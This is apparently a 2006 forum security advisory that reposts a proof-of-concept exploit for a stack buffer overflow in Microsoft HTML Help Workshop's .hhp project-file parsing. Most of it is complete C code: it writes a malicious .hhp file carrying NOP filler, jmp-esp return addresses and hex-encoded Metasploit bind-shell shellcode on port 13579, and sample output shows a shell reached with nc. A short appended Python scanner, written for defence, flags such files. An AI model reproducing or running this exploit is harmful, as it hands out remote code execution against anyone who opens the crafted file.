Microsoft HTML Workshop Code Vulnerability

Onur OKTAY
07-02-2006, 16:52 | #1

Risk: Normal

Impact: Remote code execution, weakness

Affected: Microsoft HTML Help Workshop, .hhp file

Information: A security vulnerability found in the .hhp file handling of Microsoft's HTML-based software. The vulnerability is very new and no patch is available yet.

Exploit:

/*
C:\htmlws>poc2
Microsoft HTML Help Workshop Buffer Overflow.
Coded by bratax (().
Usage: C:\htmlws\PoC2.exe <outputfile>

C:\htmlws>poc2 new.hhp
File written.
Open with Microsoft Help Workshop to exploit.

C:\htmlws>nc -vv localhost 13579
DNS fwd/rev mismatch: RENEE != localhost
RENEE [127.0.0.1] 13579 (?) open
Microsoft Windows XP [versie 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\htmlws>exit
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Start of the .hhp project file. The oversized value written after
   "Contents file=" is what overruns the stack buffer in Help Workshop. */
char pre[]=
"[OPTIONS]\n"
"Compatibility=1.1 or later\n"
"Compiled file=bratax.chm\n"
"Contents file=";

/* Remainder of the project file, written after the overflow buffer. */
char end[]=
"Display compile progress=No\n"
"Language=0x813 Dutch (Belgium)\n"
"[INFOTYPES]";

char shellcode[]=
/* bindshell port 13579 thx to metasploit.com :) */
"\x29\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8f"
"\x35\x37\x85\x83\xeb\xfc\xe2\xf4\x73\x5f\xdc\xca\x67\xcc\xc8\x7a"
"\x70\x55\xbc\xe9\xab\x11\xbc\xc0\xb3\xbe\x4b\x80\xf7\x34\xd8\x0e"
"\xc0\x2d\xbc\xda\xaf\x34\xdc\x66\xbf\x7c\xbc\xb1\x04\x34\xd9\xb4"
"\x4f\xac\x9b\x01\x4f\x41\x30\x44\x45\x38\x36\x47\x64\xc1\x0c\xd1"
"\xab\x1d\x42\x66\x04\x6a\x13\x84\x64\x53\xbc\x89\xc4\xbe\x68\x99"
"\x8e\xde\x34\xa9\x04\xbc\x5b\xa1\x93\x54\xf4\xb4\x4f\x51\xbc\xc5"
"\xbf\xbe\x77\x89\x04\x45\x2b\x28\x04\x75\x3f\xdb\xe7\xbb\x79\x8b"
"\x63\x65\xc8\x53\xbe\xee\x51\xd6\xe9\x5d\x04\xb7\xe7\x42\x44\xb7"
"\xd0\x61\xc8\x55\xe7\xfe\xda\x79\xb4\x65\xc8\x53\xd0\xbc\xd2\xe3"
"\x0e\xd8\x3f\x87\xda\x5f\x35\x7a\x5f\x5d\xee\x8c\x7a\x98\x60\x7a"
"\x59\x66\x64\xd6\xdc\x66\x74\xd6\xcc\x66\xc8\x55\xe9\x5d\x02\x8e"
"\xe9\x66\xbe\x64\x1a\x5d\x93\x9f\xff\xf2\x60\x7a\x59\x5f\x27\xd4"
"\xda\xca\xe7\xed\x2b\x98\x19\x6c\xd8\xca\xe1\xd6\xda\xca\xe7\xed"
"\x6a\x7c\xb1\xcc\xd8\xca\xe1\xd5\xdb\x61\x62\x7a\x5f\xa6\x5f\x62"
"\xf6\xf3\x4e\xd2\x70\xe3\x62\x7a\x5f\x53\x5d\xe1\xe9\x5d\x54\xe8"
"\x06\xd0\x5d\xd5\xd6\x1c\xfb\x0c\x68\x5f\x73\x0c\x6d\x04\xf7\x76"
"\x25\xcb\x75\xa8\x71\x77\x1b\x16\x02\x4f\x0f\x2e\x24\x9e\x5f\xf7"
"\x71\x86\x21\x7a\xfa\x71\xc8\x53\xd4\x62\x65\xd4\xde\x64\x5d\x84"
"\xde\x64\x62\xd4\x70\xe5\x5f\x28\x56\x30\xf9\xd6\x70\xe3\x5d\x7a"
"\x70\x02\xc8\x55\x04\x62\xcb\x06\x4b\x51\xc8\x53\xdd\xca\xe7\xed"
"\xf1\xed\xd5\xf6\xdc\xca\xe1\x7a\x5f\x35\x37\x85";

char overflow[15000]; // 15k just to make sure :)

int main(int argc,char *argv[])
{
    FILE *vuln;
    if(argc == 1)
    {
        printf("Microsoft HTML Help Workshop Buffer Overflow.\n");
        printf("Coded by bratax (().\n");
        printf("Usage: %s <outputfile>\n",argv[0]);
        return 0;
    }
    vuln = fopen(argv[1],"w");
    //build overflow buffer here.
    memset(overflow,0x90,sizeof(overflow)); //fill with nops
    memcpy(overflow+272,"\x5d\x38\x82\x7c",4); //EIP (jmp esp) 1 of these is
    memcpy(overflow+276,"\x5d\x38\x82\x7c",4); //EIP (jmp esp) enough but was
    memcpy(overflow+280,"\x5d\x38\x82\x7c",4); //EIP (jmp esp) a bit lazy to
    memcpy(overflow+284,"\x5d\x38\x82\x7c",4); //EIP (jmp esp) find out the
    memcpy(overflow+288,"\x5d\x38\x82\x7c",4); //EIP (jmp esp) correct one :p
    memcpy(overflow+292,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)
    //our shellcode after some nops to land in; sizeof() includes the
    //terminating NUL, which is also what ends the %s write below.
    memcpy(overflow+300,shellcode,sizeof(shellcode));

    if(vuln)
    {
        //Write file
        fprintf(vuln,"%s%s\n%s",pre,overflow,end);
        fclose(vuln);
        printf("File written.\nOpen with Microsoft Help Workshop to exploit.\n");
    }
    else
    {
        perror("fopen");
        return 1;
    }
    return 0;
}

Source: MilW0rM.

Security Advisory by Onur OKTAY
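As an added, defender-side example (not part of this post or the milw0rm PoC): a Python heuristic that parses the INI-style .hhp format the PoC writes and flags the traits of such a file, an oversized "Contents file=" path value and a long run of identical filler bytes. The sample project texts are constructed; the 260-byte limit is Windows MAX_PATH and the 32-byte run length is an assumed tuning value.

```python
"""Heuristic checker for .hhp project files (constructed example)."""
import re
from typing import List, Tuple

MAX_PATH = 260      # a file-name value longer than Windows MAX_PATH is not legitimate
SLED_RUN = 32       # assumed: this many identical consecutive bytes looks like NOP filler
SECTION_RE = re.compile(rb"^\[([^\]]+)\]$")
RUN_RE = re.compile(rb"(.)\1{%d,}" % (SLED_RUN - 1), re.DOTALL)

def scan_hhp(data: bytes) -> List[Tuple[int, str]]:
    """Parse the INI-style .hhp text and return (line_no, reason) findings.

    Flags oversized values, long runs of one byte, control bytes inside a
    value, and lines that are neither a section header, key=value, a ';'
    comment nor blank. Parsing is line-based, like the project-file reader.
    """
    findings = []
    section = "<none>"
    for no, raw in enumerate(data.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith(b";"):
            continue
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1).decode("ascii", "replace")
            continue
        if b"=" not in line:
            findings.append((no, f"[{section}]: line is not key=value"))
            continue
        key, value = (part.strip() for part in line.split(b"=", 1))
        name = f"[{section}] {key.decode('ascii', 'replace')}"
        if len(value) > MAX_PATH:
            findings.append((no, f"{name}: value is {len(value)} bytes (> {MAX_PATH})"))
        if RUN_RE.search(value):
            findings.append((no, f"{name}: run of {SLED_RUN}+ identical bytes"))
        if any(b < 0x20 for b in value):
            findings.append((no, f"{name}: control bytes in value"))
    return findings

# Constructed samples: a well-formed project, and one shaped like the PoC output
# with 0x90 filler and a dummy 4-byte "return address" instead of real shellcode.
GOOD_HHP = b"[OPTIONS]\nCompatibility=1.1 or later\nCompiled file=help.chm\nContents file=help.hhc\n[INFOTYPES]\n"
BAD_HHP = (b"[OPTIONS]\nCompatibility=1.1 or later\nCompiled file=help.chm\n"
           b"Contents file=" + b"\x90" * 272 + b"BBBB" + b"\x90" * 24 + b"\n"
           b"Display compile progress=No\n[INFOTYPES]\n")

if __name__ == "__main__":
    for no, reason in scan_hhp(BAD_HHP):
        print(f"line {no}: {reason}")
```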